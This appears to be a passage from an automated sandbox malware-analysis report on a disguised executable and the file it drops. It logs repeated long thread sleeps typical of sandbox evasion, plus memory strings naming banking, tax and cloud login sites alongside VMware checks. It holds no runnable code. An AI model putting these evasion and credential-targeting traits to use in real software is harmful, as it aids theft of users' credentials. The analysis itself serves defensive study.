Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -597733s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -597624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -597514s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -597385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -597280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -594843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -594494s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -594391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -594266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -594141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -594031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784	Thread sleep time: -593922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 6932	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 6216	Thread sleep count: 2942 > 30
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 6216	Thread sleep count: 6907 > 30
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -599445s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -599216s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -599106s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -598900s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -598623s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -598515s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -598406s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -598296s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -598187s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -598078s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -597968s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -597859s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -597750s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -597640s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -597531s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -597421s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -597312s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -597203s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -597092s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -596874s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -596765s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -596546s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -596084s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -595811s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -595692s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -595562s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -595453s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -595344s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -595223s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -595094s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -594984s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -594875s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -594765s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -594656s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -594547s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -594437s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -594328s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -594219s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -594109s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -593999s >= -30000s
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172	Thread sleep time: -593885s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599870	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597733	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597624	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597514	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597385	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597280	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594494	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594266	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Thread delayed: delay time: 593922	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599445
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599216
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 599106
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598900
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598623
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598515
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598406
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598296
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 597092
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596874
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 596084
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595811
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595692
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595562
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595344
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595223
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594547
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594437
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594328
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594219
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 594109
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 593999
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Thread delayed: delay time: 593885

Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
